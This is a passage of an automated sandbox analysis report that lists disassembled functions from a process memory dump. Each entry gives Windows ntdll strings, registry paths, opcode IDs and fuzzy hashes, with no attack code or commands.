                                                                                                                                                  • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 05C3CD34
                                                                                                                                                  • InstallLanguageFallback, xrefs: 05C3CD7F
                                                                                                                                                  • @, xrefs: 05C3CD63
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                                                                                  • API String ID: 0-1757540487
                                                                                                                                                  • Opcode ID: 3f457b64e28356fed96c8f4974bc48933f39686b933bd06a4ca7c75648d10f34
                                                                                                                                                  • Instruction ID: 2d7979dafd7c1e519319f039ca8194aa0be7c4c7c4b3674347d0af83d3721429
                                                                                                                                                  • Opcode Fuzzy Hash: 3f457b64e28356fed96c8f4974bc48933f39686b933bd06a4ca7c75648d10f34
                                                                                                                                                  • Instruction Fuzzy Hash: F351D3B65083459BCB14DF64C848ABBB3E8FF88754F440D2EF986E7250E734DA0487A2
                                                                                                                                                  Function 05C7C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 05CB82DE
                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 05CB82E8
                                                                                                                                                  • Failed to reallocate the system dirs string !, xrefs: 05CB82D7
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                  • API String ID: 0-1783798831
                                                                                                                                                  • Opcode ID: 2cb511bd1e94331640b4138917b6ac63d8e56f077487d1a9aad7b15758b50bce
                                                                                                                                                  • Instruction ID: 6408715c2f4413598a3d509fe5d38a653f3f22e0e5c9b3722244ca926f6fdde6
                                                                                                                                                  • Opcode Fuzzy Hash: 2cb511bd1e94331640b4138917b6ac63d8e56f077487d1a9aad7b15758b50bce
                                                                                                                                                  • Instruction Fuzzy Hash: C841F175658305EBD720EB68D88AF5B7BE8FF45650F000D6AF849D3250EBB0D900DB91
                                                                                                                                                  Function 05CFC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • PreferredUILanguages, xrefs: 05CFC212
                                                                                                                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 05CFC1C5
                                                                                                                                                  • @, xrefs: 05CFC1F1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                                                  • API String ID: 0-2968386058
                                                                                                                                                  • Opcode ID: 58d68928d3a221a1637ffbe333408861f5dbbeb0594e11cc3fbabcc751a30b6f
                                                                                                                                                  • Instruction ID: d53b21ecc5e912fd7328059173eb36727e0cbd54ad5d98926bd6ca6ba5122b21
                                                                                                                                                  • Opcode Fuzzy Hash: 58d68928d3a221a1637ffbe333408861f5dbbeb0594e11cc3fbabcc751a30b6f
                                                                                                                                                  • Instruction Fuzzy Hash: 9F417E72B0420DEBDB51DAD4C885FEEB7B9FB14704F14486AEA06A7240D7B49F449B50
                                                                                                                                                  Function 05CC4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 05CC4899
                                                                                                                                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 05CC4888
                                                                                                                                                  • LdrpCheckRedirection, xrefs: 05CC488F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                  • API String ID: 0-3154609507
                                                                                                                                                  • Opcode ID: 5ba33c6b5c0efe9aad6117b78b7ad494f57969410c152d575d5e337bcc6f6833
                                                                                                                                                  • Instruction ID: 5d33556e89ffbbf294f3cd33ee1bbb2815b372ec78188b355b782d6208f85941
                                                                                                                                                  • Opcode Fuzzy Hash: 5ba33c6b5c0efe9aad6117b78b7ad494f57969410c152d575d5e337bcc6f6833
                                                                                                                                                  • Instruction Fuzzy Hash: 5441AF32A082509BCF29CE59D8A0A267FF5BB49A51B0589EDEC49D7711D730D900CB91
                                                                                                                                                  Function 05CD4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                                                  • API String ID: 0-1373925480
                                                                                                                                                  • Opcode ID: d6b22c0ac83626e2746e97115bc3e87299433f8ebe1c147cdf89241eb73d50d7
                                                                                                                                                  • Instruction ID: 737b67102e8ed8ffd715fc9d16f52b9ea1e038fec2136443b39959d852fe8976
                                                                                                                                                  • Opcode Fuzzy Hash: d6b22c0ac83626e2746e97115bc3e87299433f8ebe1c147cdf89241eb73d50d7
                                                                                                                                                  • Instruction Fuzzy Hash: 8741E271A042988BDF29DBD5C884BADF7B5FF45740F140C5ADA02EB791D7B48A41CB20
                                                                                                                                                  Function 05CC20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 05CC2104
                                                                                                                                                  • Process initialization failed with status 0x%08lx, xrefs: 05CC20F3
                                                                                                                                                  • LdrpInitializationFailure, xrefs: 05CC20FA
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                  • API String ID: 0-2986994758
                                                                                                                                                  • Opcode ID: b79bdb9d5d84109aa0d5e94e7c6fe9391397836b0c1f14a75e43e872e2d0727b
                                                                                                                                                  • Instruction ID: 4efea85a75a33b396e2ffa389d2c4cef5439c593ed23c24561761532bdb934d5
                                                                                                                                                  • Opcode Fuzzy Hash: b79bdb9d5d84109aa0d5e94e7c6fe9391397836b0c1f14a75e43e872e2d0727b
                                                                                                                                                  • Instruction Fuzzy Hash: 55F02875640208BBD714EA4CCC47F993F68EB41B04F000CA9FA4077680D5B0AA00E681
                                                                                                                                                  Function 05C503E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                  • String ID: #%u
                                                                                                                                                  • API String ID: 48624451-232158463
                                                                                                                                                  • Opcode ID: 333bc548d50170ffa6c991c2fe772c2b014df7066869bec5f5ceabb3b73d8a33
                                                                                                                                                  • Instruction ID: 74806d698c110ab0adce11eb9e7393aab46ca73617e51c96a9f09b932d943254
                                                                                                                                                  • Opcode Fuzzy Hash: 333bc548d50170ffa6c991c2fe772c2b014df7066869bec5f5ceabb3b73d8a33
                                                                                                                                                  • Instruction Fuzzy Hash: 0C715E72A0014A9FDB05DF98C984FAEBBB8FF08744F140865E905E7251EB74EE41CB64
                                                                                                                                                  Function 05CCCEA0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 05CCCFBD
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CallFilterFunc@8
                                                                                                                                                  • String ID: @
                                                                                                                                                  • API String ID: 4062629308-2766056989
                                                                                                                                                  • Opcode ID: 2c52b79e53a7bd3f154093127ba04a8266c330bdcc89e5ffafce074ff824ea11
                                                                                                                                                  • Instruction ID: 772037102399a3b1407e8776a252950a5b964e6a9e1a41ad59ebac0c9c9ca4ce
                                                                                                                                                  • Opcode Fuzzy Hash: 2c52b79e53a7bd3f154093127ba04a8266c330bdcc89e5ffafce074ff824ea11
                                                                                                                                                  • Instruction Fuzzy Hash: 72419D75A00254DFCB21EFA9C845AAEBBB8FF44B10F00487EE916DB250E734D945DB68
                                                                                                                                                  Function 05D0A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: `$`
                                                                                                                                                  • API String ID: 0-197956300
                                                                                                                                                  • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                                  • Instruction ID: f348545121a69bf0abcde4c91d8b195aaf3fe0336c8db9bb332c843f67d32771
                                                                                                                                                  • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                                  • Instruction Fuzzy Hash: A4C1BF312083429BDB25CF28C845B6BBBE6FFC4318F189A2EF5968A2D0D774D545CB91
                                                                                                                                                  Function 05CE2F60 Relevance: 2.8, Strings: 2, Instructions: 327COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • *** ASSERT FAILED: Input parameter pwmszLanguage for function RtlGetUILanguageInfo is not a valid multi-string!, xrefs: 05CE3011
                                                                                                                                                  • , xrefs: 05CE32B8
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: $*** ASSERT FAILED: Input parameter pwmszLanguage for function RtlGetUILanguageInfo is not a valid multi-string!
                                                                                                                                                  • API String ID: 0-4088147954
                                                                                                                                                  • Opcode ID: 4b7e224fc92076c4aa8873ecb021eccc608b0f512e24da607ed84e95a87549d9
                                                                                                                                                  • Instruction ID: 43994983a4097be50421d6b9adbe4737ee60b404416b832ca8157a9a907be6f4
                                                                                                                                                  • Opcode Fuzzy Hash: 4b7e224fc92076c4aa8873ecb021eccc608b0f512e24da607ed84e95a87549d9
                                                                                                                                                  • Instruction Fuzzy Hash: DCC18C316083819BDB21CF55C884B6BB7E6BF88B14F044D1DF9869B240EB75FA45CB92
                                                                                                                                                  Function 05CBE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID: Legacy$UEFI
                                                                                                                                                  • API String ID: 2994545307-634100481
                                                                                                                                                  • Opcode ID: 6cb198648b1e4fb605170d43117750f258a1247b74fc9b0a2d1dcbf399e234f7
                                                                                                                                                  • Instruction ID: 7eb21044e82fa20e37c34b64a4c424aa1296ef0b1c72134b66cb003f3bdc97a8
                                                                                                                                                  • Opcode Fuzzy Hash: 6cb198648b1e4fb605170d43117750f258a1247b74fc9b0a2d1dcbf399e234f7
                                                                                                                                                  • Instruction Fuzzy Hash: 94618D71E046189FEB14DFA9C844BEEBBF9FB48B00F14482DE509EB241D771A940DB50
                                                                                                                                                  Function 05C4AC50 Relevance: 2.7, Strings: 2, Instructions: 178COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • LdrpResGetMappingSize Exit, xrefs: 05C4AC7C
                                                                                                                                                  • LdrpResGetMappingSize Enter, xrefs: 05C4AC6A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: LdrpResGetMappingSize Enter$LdrpResGetMappingSize Exit
                                                                                                                                                  • API String ID: 0-1497657909
                                                                                                                                                  • Opcode ID: f2499f73cad17cdbb0b2ee61f9f95a1dfa837f02814e8c8387fce2538accf87a
                                                                                                                                                  • Instruction ID: 8641b92e736c40d752360282b3af0077c61f1a651ad4d2902fbd575830bd50e1
                                                                                                                                                  • Opcode Fuzzy Hash: f2499f73cad17cdbb0b2ee61f9f95a1dfa837f02814e8c8387fce2538accf87a
                                                                                                                                                  • Instruction Fuzzy Hash: D061E472A446859FEB11CFA9C854FADBBB6FF44755F040D69E802EB290D778DA40CB20
                                                                                                                                                  Function 05CE43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: @$MUI
                                                                                                                                                  • API String ID: 0-17815947
                                                                                                                                                  • Opcode ID: de713334496852faeebb6469e78ae3ff5ac45ed00c8b549eb0596afa54f04d3b
                                                                                                                                                  • Instruction ID: 9781035dcca3dafa0faa7a3defbd89b3cdfc5cb477458d631727f64c315b789a
                                                                                                                                                  • Opcode Fuzzy Hash: de713334496852faeebb6469e78ae3ff5ac45ed00c8b549eb0596afa54f04d3b
                                                                                                                                                  • Instruction Fuzzy Hash: AA513771E0121DAEDF11DFA9CC88EEEBBB9FB44754F10092AE511B7280E6709E45CB60
                                                                                                                                                  Function 05C74C59 Relevance: 2.7, Strings: 2, Instructions: 164COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 0$Flst
                                                                                                                                                  • API String ID: 0-758220159
                                                                                                                                                  • Opcode ID: a2348511bdc03e747100412422d19563c5ab1ba5e7f9aa42f1a15abe1e0a5399
                                                                                                                                                  • Instruction ID: c7a5333dce8e94a30871a64d9ac5cd4ae3ee457c0c9e25593df398dda052ebf8
                                                                                                                                                  • Opcode Fuzzy Hash: a2348511bdc03e747100412422d19563c5ab1ba5e7f9aa42f1a15abe1e0a5399
                                                                                                                                                  • Instruction Fuzzy Hash: C351AFB1E00258CFDF28CF99C484AB9FBF5FF54715F14882AD0499B650EB749A85CB80
                                                                                                                                                  Function 05C404E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • kLsE, xrefs: 05C40540
                                                                                                                                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 05C4063D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                                  • API String ID: 0-2547482624
                                                                                                                                                  • Opcode ID: 38ef69198526c3963f728cca7f8fc05c1ed6a5e760bb25ea2e60727a4748b3da
                                                                                                                                                  • Instruction ID: e984fa049850e08ae202ebab177583045ce08244795f99721f870d3cdc3a92d5
                                                                                                                                                  • Opcode Fuzzy Hash: 38ef69198526c3963f728cca7f8fc05c1ed6a5e760bb25ea2e60727a4748b3da
                                                                                                                                                  • Instruction Fuzzy Hash: 0251AC716547429BC724EF69C448AE3B7E9BF84304F004C3EEA9A9B240E7709645CF96
                                                                                                                                                  Function 05C72E9C Relevance: 2.6, Strings: 2, Instructions: 130COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand, xrefs: 05CB280C
                                                                                                                                                  • RtlpInsertAssemblyStorageMapEntry, xrefs: 05CB2807
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: RtlpInsertAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand
                                                                                                                                                  • API String ID: 0-2104531740
                                                                                                                                                  • Opcode ID: 63f56a2ab4c98508fa069043f98cb13de1c514bb222d8a6ea9f2d4d296aa2933
                                                                                                                                                  • Instruction ID: ac45698eccf762c113b48be11112a844dfe67cf9c7b0c09cd807f0e0fd1ddd6f
                                                                                                                                                  • Opcode Fuzzy Hash: 63f56a2ab4c98508fa069043f98cb13de1c514bb222d8a6ea9f2d4d296aa2933
                                                                                                                                                  • Instruction Fuzzy Hash: 1541F47A600215ABEB24DF56C840EBAF3B6FF94B10F11882DE855AB640D770DD41CB94
                                                                                                                                                  Function 05C4A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • RtlpResUltimateFallbackInfo Enter, xrefs: 05C4A2FB
                                                                                                                                                  • RtlpResUltimateFallbackInfo Exit, xrefs: 05C4A309
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                                  • API String ID: 0-2876891731
                                                                                                                                                  • Opcode ID: 992e384bf09933f18f64d0d02aca48dce92a00f6cc1f4e6edd295293ffb8bbf5
                                                                                                                                                  • Instruction ID: 3a60afbb95caee52d174fd1d0156894dea4368df46f4df53bbd6f8e222a218b1
                                                                                                                                                  • Opcode Fuzzy Hash: 992e384bf09933f18f64d0d02aca48dce92a00f6cc1f4e6edd295293ffb8bbf5
                                                                                                                                                  • Instruction Fuzzy Hash: C0410E35A44259CBCB21CF69D840F6A7BB6FF80704F1448A9EC02DB6A0E374CA40CB40
                                                                                                                                                  Function 05C80FF6 Relevance: 2.6, Strings: 2, Instructions: 92COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • @, xrefs: 05C81050
                                                                                                                                                  • \Registry\Machine\System\CurrentControlSet\Control, xrefs: 05C81025
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: @$\Registry\Machine\System\CurrentControlSet\Control
                                                                                                                                                  • API String ID: 0-2976085014
                                                                                                                                                  • Opcode ID: 1c42a6f9a8a5c13d0cfd5be2383abec62da427e9031e051912bf9a5ee16cb405
                                                                                                                                                  • Instruction ID: 38ecffd33c7731b12ff0410e2f2b03cc274429325d6faea1f80b300443cd9131
                                                                                                                                                  • Opcode Fuzzy Hash: 1c42a6f9a8a5c13d0cfd5be2383abec62da427e9031e051912bf9a5ee16cb405
                                                                                                                                                  • Instruction Fuzzy Hash: 8F318672A00588AFDB12EF95CC88EAFBBB9EB84B54F050925E501A7250D7B49D41DBA0
                                                                                                                                                  Function 05CDAEB0 Relevance: 2.6, Strings: 2, Instructions: 89COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 05CDAF2F
                                                                                                                                                  • Ek<, xrefs: 05CDAF41
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Ek<$NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                                                                                                  • API String ID: 0-2792189438
                                                                                                                                                  • Opcode ID: 6d93ec9f9f7fe5535381d93f841cbe49089cdf3789f36e00dc71f8657c03a0a7
                                                                                                                                                  • Instruction ID: 24185b40421ef4d1b4d6520756dd77fc25e39040813a12a7a839f6375db0208e
                                                                                                                                                  • Opcode Fuzzy Hash: 6d93ec9f9f7fe5535381d93f841cbe49089cdf3789f36e00dc71f8657c03a0a7
                                                                                                                                                  • Instruction Fuzzy Hash: C43108B6A04614AFDB15DF68CC45F6AFBB5FB44B10F148966F601D7740D738A900CBA0
                                                                                                                                                  Function 05C7A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID: Cleanup Group$Threadpool!
                                                                                                                                                  • API String ID: 2994545307-4008356553
                                                                                                                                                  • Opcode ID: 9661bbb11352c6a7316768db70cb188ca09ab45303cd31d7e7c2ec0e33ebde7d
                                                                                                                                                  • Instruction ID: 21d1ab8a64bd08f8928997ff6268beb73ed4fb6113c4d7dc974e38ee5a48c708
                                                                                                                                                  • Opcode Fuzzy Hash: 9661bbb11352c6a7316768db70cb188ca09ab45303cd31d7e7c2ec0e33ebde7d
                                                                                                                                                  • Instruction Fuzzy Hash: 1801F4B2254704AFD312DF18CD4AF2A77E8E744715F008D7AB558C7590E734D904DB4A
                                                                                                                                                  Function 05C4C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: MUI
                                                                                                                                                  • API String ID: 0-1339004836
                                                                                                                                                  • Opcode ID: ac14340a767e62c4b2f01201a0966dec84542575b3f6e2868a18bcc0c0a98fe7
                                                                                                                                                  • Instruction ID: 455f8ef03cf43dbd8ea9a8417268be9f37189b3209cbed11aa55b99fae9c92cf
                                                                                                                                                  • Opcode Fuzzy Hash: ac14340a767e62c4b2f01201a0966dec84542575b3f6e2868a18bcc0c0a98fe7
                                                                                                                                                  • Instruction Fuzzy Hash: 39825C75E052189BDB24DFA9C984FADB7B2FF48310F14896AD81AAB360D7709E41CF50
                                                                                                                                                  Function 05C42FC8 Relevance: 1.7, Strings: 1, Instructions: 410COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: PATH
                                                                                                                                                  • API String ID: 0-1036084923
                                                                                                                                                  • Opcode ID: e922c1f47077471dd8accaacf2a40762ad467265db2deaecd4d89f692bc83302
                                                                                                                                                  • Instruction ID: b369a1d5e298229c9129ea23d4166226ed68e049333fadfe18b21677ff99cf8d
                                                                                                                                                  • Opcode Fuzzy Hash: e922c1f47077471dd8accaacf2a40762ad467265db2deaecd4d89f692bc83302
                                                                                                                                                  • Instruction Fuzzy Hash: B0F18071E142549BCB25DF9DD881EBEBBB1FF88B10F54486AE841AB340DB349981CF90
                                                                                                                                                  Function 05CDCC20 Relevance: 1.6, Strings: 1, Instructions: 353COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
